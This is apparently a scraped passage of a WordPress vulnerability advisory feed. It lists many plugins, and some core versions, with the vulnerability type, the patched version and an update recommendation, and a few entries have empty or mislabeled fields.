Recommended Action: Update to version 1.1, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.9.97.21
Recommended Action: Update to version 0.9.97.21, or a newer patched version

Plugin: CTX Feed – WooCommerce Product Feed Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.15
Recommended Action: Update to version 3.1.15, or a newer patched version

Plugin: Bulk Creator

Plugin: The Sorter

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: Recent Posts Widget Extended

Vulnerability: Cross Site-Scripting
Patched Version: 0.9.9.4
Recommended Action: Update to version 0.9.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.11, 2.2.2

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Unprotected AJAX including Privilege Escalation
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: User Activity Log

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Import
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: TinyChat Room Spy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.24
Recommended Action: Update to version 3.9.24, or a newer patched version

Plugin: Real Testimonials – Testimonial Slider, Carousel, Grid | Collect Customer Reviews and Video Testimonial with Testimonial Form | Social Proof Reviews and Review Slider

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting via Shortcode
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Information Reel

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 10.1
Recommended Action: Update to version 10.1, or a newer patched version

Plugin: BadgeOS

Vulnerability: Missing Authorization in delete_badgeos_log_entries
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated SQL Injection via Multiple Parameters
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: SQL Injection
Patched Version: 6.90
Recommended Action: Update to version 6.90, or a newer patched version

Plugin: W4 Post List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Options
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: No subtitle
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: RSFirewall!

Vulnerability: IP Address Spoofing
Patched Version: 1.1.25
Recommended Action: Update to version 1.1.25, or a newer patched version

Core: WordPress

Vulnerability: Incorrect Authorization Checks
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors

Vulnerability: Authenticated (Shop manager+) SQL Injection via search dates
Patched Version: 2.4.7.1
Recommended Action: Update to version 2.4.7.1, or a newer patched version

Plugin: Lightbox Photo Gallery

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.40
Recommended Action: Update to version 3.3.40, or a newer patched version

Plugin: XML Sitemap Generator for Google

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress Events Calendar Plugin – connectDaily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Booking Package

Vulnerability: Authorization Bypass to Arbitrary Password Reset
Patched Version: 1.5.99
Recommended Action: Update to version 1.5.99, or a newer patched version

Plugin: Wallet for WooCommerce

Vulnerability: Cross-Site Request Forgery via lock_unlock_terawallet
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP Fusion Lite – Marketing Automation and CRM Integration for WordPress

Vulnerability: No subtitle
Patched Version: 3.37.30
Recommended Action: Update to version 3.37.30, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.102
Recommended Action: Update to version 1.2.102, or a newer patched version

Plugin: Weblizar Pin It Button On Image Hover And Post

Vulnerability: Authorization Bypass
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Audio

Plugin: User Profile Picture

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Unauthenticated Arbitrary Ticket Deletion
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.16
Recommended Action: Update to version 2.1.16, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.68
Recommended Action: Update to version 1.5.68, or a newer patched version

Core: WordPress

Vulnerability: XXE Injection
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Missing Authorization to Contributor+ Form Submission Export
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: ClickFunnels

Plugin: Facebook for WooCommerce

Vulnerability: Cross-Site Request Forgery allowing Option Update
Patched Version: 1.9.15
Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: WP Fast Cache

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Cross-Site Request Forgery via wishlist_add and wishlist_remove
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Image Photo Gallery Final Tiles Grid

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4.19
Recommended Action: Update to version 3.4.19, or a newer patched version

Plugin: ND Shortcodes

Vulnerability: Unauthenticated WordPress Options Update
Patched Version: 6.0
Recommended Action: Update to version 6.0, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated(Subscriber+) Arbitrary File Upload via upload_file
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: Redirection Page

Plugin: Disable WordPress Update Notifications and auto-update Email Notifications

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Quantity Plus Minus Button for WooCommerce by CodeAstrology

Vulnerability: Cross-Site Request Forgery via wqpmb_form_submit
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Social Sharing Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: fitness calculators

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WP Cost Estimation

Vulnerability: Upload Directory Traversal
Patched Version: 9.660
Recommended Action: Update to version 9.660, or a newer patched version

Plugin: THE Leads Management System: 59sec LITE

Vulnerability: Authorization Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 1app Business Forms

Plugin: One Click Plugin Updater

Plugin: WP Fastest Cache

Vulnerability: SQL Injection
Patched Version: 0.8.7.5
Recommended Action: Update to version 0.8.7.5, or a newer patched version

Plugin: Eventify™ – Simple Events

Vulnerability: Simple Events <= 1.7.f
Patched Version: 1.7.g
Recommended Action: Update to version 1.7.g, or a newer patched version

Plugin: Perelink Pro

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: ZM Ajax Login & Register

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Zoho Forms – Drag & Drop Form Builder for Websites – Contact Forms, Payment Forms, Order Forms & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP Forum Server

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: directories

Vulnerability: Cross-Site Scripting via _drts_form_build_id, _t_ Parameters
Patched Version: 1.3.46
Recommended Action: Update to version 1.3.46, or a newer patched version

Plugin: Pinyin Slugs

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Dynamic QR Code Generator

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Authenticated Stored Cross-SIte Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: Display Users

Plugin: Sitewide Notice WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Masked Login Area Security Feature Bypass
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: Captcha Code

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: wp-Monalisa

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Good LMS – Learning Management System WP Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.01
Recommended Action: Update to version 1.4.01, or a newer patched version

Plugin: Contempo Real Estate Custom Posts

Vulnerability: Unauthorized File Upload
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 7.41
Recommended Action: Update to version 7.41, or a newer patched version

Plugin: Seraphinite Alternative Slugs Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ajax Archive Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: weebotLite

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 7.63
Recommended Action: Update to version 7.63, or a newer patched version

Plugin: Cloudflare Turnstile or reCAPTCHA For any Pages, to Block Spam and Hackers Attack.

Vulnerability: Missing Authorization via recaptcha_for_all_image_select
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Olevmedia Shortcodes

Plugin: HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics

Vulnerability: Server Side Request Forgery
Patched Version: 8.8.15
Recommended Action: Update to version 8.8.15, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: WP Rating System <= 3.4.1
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Symbiostock – Sell Photos Online For Free!

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Video Embed

Plugin: Participants Database

Vulnerability: Unauthorized Cross-Site Scripting
Patched Version: 1.7.5.10
Recommended Action: Update to version 1.7.5.10, or a newer patched version

Plugin: masterslider

Plugin: BSK PDF Manager

Vulnerability: 2.9
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WP Tools Increase Maximum Limits, Repair, Server PHP Info, Javascript errors, File Permissions, Transients, Error Log

Vulnerability: Missing Authorization to Select Plugin Installation
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.16
Recommended Action: Update to version 2.1.16, or a newer patched version

Plugin: WP e-Commerce – Store Exporter

Vulnerability: Missing Authorization
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Blocks

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Limit Login Attempts Reloaded

Vulnerability: Login Rate Limiting Bypass
Patched Version: 2.17.4
Recommended Action: Update to version 2.17.4, or a newer patched version

Plugin: Plainview Activity Monitor

Vulnerability: Remote Command Injection
Patched Version: 20180826
Recommended Action: Update to version 20180826, or a newer patched version

Plugin: Jazz Popups

Plugin: Woo Email Control

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.02
Recommended Action: Update to version 1.02, or a newer patched version

Plugin: RoyalSlider

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: Invit0r

Plugin: WP Reset Pro – Most Advanced WordPress Reset Tool

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.99
Recommended Action: Update to version 5.99, or a newer patched version

Plugin: No Page Comment

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Rotating Posts

Plugin: Dropdown Menu Widget

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authorization Bypass to Arbitrary File Upload
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: WooCommerce Order Status Change Notifier

Vulnerability: Authenticated (Subscriber+) Arbitrary Order Status Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP RSS By Publishers

Plugin: Download buttons for Youtube videos

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Advanced Coupons – WooCommerce Coupons, Store Credit, Gift Cards, Loyalty Program, BOGO Coupons, Discount Rules

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.0.1
Recommended Action: Update to version 4.5.0.1, or a newer patched version

Plugin: Opal Hotel Room Booking

Plugin: Blossom Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP Login Box

Plugin: Swifty Bar, sticky bar by WPGens

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Responsive Cookie Consent

Vulnerability: Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘sortdata’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Map

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Custom Meta Widget
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Open Redirect
Patched Version: 3.6.4.4
Recommended Action: Update to version 3.6.4.4, or a newer patched version

Plugin: Subscribers – Free Web Push Notifications

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP Jobs

Vulnerability: Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Simple Vimeo Shortcode

Plugin: Gallery – Image and Video Gallery with Thumbnails

Plugin: iframe

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via srcdoc
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: Google Analytics MU

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Mapwiz

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Missing Authorization
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘resend’
Patched Version: 10.5.5
Recommended Action: Update to version 10.5.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.2.1
Recommended Action: Update to version 2.11.2.1, or a newer patched version

Plugin: Video PopUp

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Supply Chain Compromise
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Postie

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Capabilities Check to Information Disclosure
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Woo Custom and Sequential Order Number

Plugin: pb-embedflash

Plugin: WP htaccess Control

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Missing Authorization
Patched Version: 17.0.18
Recommended Action: Update to version 17.0.18, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: SALERT – Fake Sales Notification WooCommerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting via image alt and title text
Patched Version: 2.2.45
Recommended Action: Update to version 2.2.45, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Link Library

Vulnerability: No subtitle
Patched Version: 5.9.13.27
Recommended Action: Update to version 5.9.13.27, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.95
Recommended Action: Update to version 7.95, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: SQL Injection
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Authenticated SQL Injection
Patched Version: 5.149
Recommended Action: Update to version 5.149, or a newer patched version

Plugin: Post Teaser

Plugin: ClickSold IDX

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.49
Recommended Action: Update to version 1.49, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via emailf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: Woo Custom Emails

Vulnerability: Reflected Cross-Site Scripting via wcemails_edit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import External Images

Vulnerability: Cross-Site Request Forgery via external_image_import_all_ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: G Auto-Hyperlink

Plugin: WP-Hijri

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Meow Gallery

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Admin+ SQL Injection via Order and OrderBy parameters
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: SearchIQ – The Search Solution

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: WordPress Bitcoin Payments – Blockonomics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Top Quark Architecture

Vulnerability: Arbitrary File Upload
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Block for Apple Maps

Vulnerability: Uncontrolled Resource Consumption
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Great Quotes

Plugin: Reusable Blocks Extended

Vulnerability: Cross-Site Request Forgery via reblex_reusable_screen_block_pattern_registration
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Arbitrary Shortcode Execution
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: VM Backups

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Subscriber+ Arbitrary File Upload
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Ninja Job Board – Ultimate WordPress Job Board Plugin

Vulnerability: Information Disclosure
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Cookie Notice & Consent Banner for GDPR & CCPA Compliance

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: E-Search

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.16
Recommended Action: Update to version 8.0.16, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.71
Recommended Action: Update to version 3.0.71, or a newer patched version

Plugin: amCharts: Charts and Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Admininstrator+) Local File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Stream

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.25
Recommended Action: Update to version 1.8.25, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 5.15.2
Recommended Action: Update to version 5.15.2, or a newer patched version

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Remote Code Execution
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Arbitrary Media Deletion
Patched Version: 8.0.9
Recommended Action: Update to version 8.0.9, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Markdown Editor (Formerly Dark Mode)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.2.7
Recommended Action: Update to version 9.2.7, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.21
Recommended Action: Update to version 2.0.21, or a newer patched version

Plugin: Product Enquiry for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting via name
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Dynamic Font Replacement DFR4WP EN

Plugin: WooCommerce PensoPay

Vulnerability: Reflected Cross-Site Scripting via ‘pensopay_action’
Patched Version: 6.3.2
Recommended Action: Update to version 6.3.2, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: th23 Social

Plugin: ad-minister

Plugin: teachPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.1.9
Recommended Action: Update to version 8.1.9, or a newer patched version

Plugin: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.14.2
Recommended Action: Update to version 7.14.2, or a newer patched version

Plugin: Mobile browser color select

Plugin: తెలుగు బైబిల్ వచనములు

Plugin: Footer Putter

Plugin: The Awesome Feed – Custom Feed

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
